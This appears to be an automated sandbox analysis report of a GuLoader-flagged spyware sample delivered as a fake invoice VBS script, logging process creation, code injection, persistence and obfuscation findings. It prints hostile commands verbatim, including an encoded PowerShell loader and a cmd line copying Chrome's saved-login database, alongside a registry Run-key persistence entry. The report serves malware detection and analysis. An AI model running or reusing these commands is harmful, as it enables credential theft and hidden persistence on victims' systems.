Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220510 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Hetero3.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@22/16@21/8
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:120:WilError_03
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
Source: C:\Windows\SysWOW64\chkdsk.exe File written: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: chkdsk.pdbGCTL source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: $2l8C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1816473649.0000000008901000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.1581138721.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_0300E359 push F6D28566h; ret 27_2_0300E35E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0070E287 push B364374Eh; iretd 32_2_0070E2E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D4F2 push eax; ret 32_2_0071D4F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D4FB push eax; ret 32_2_0071D562
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D4A5 push eax; ret 32_2_0071D4F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D55C push eax; ret 32_2_0071D562
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071E90F push esp; ret 32_2_0071E916
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00717B37 push cs; ret 32_2_00717B39
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72ACD4 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW, 37_2_00000265BE72ACD4
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72ACE2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW, 37_2_00000265BE72ACE2
Source: C:\Windows\SysWOW64\chkdsk.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
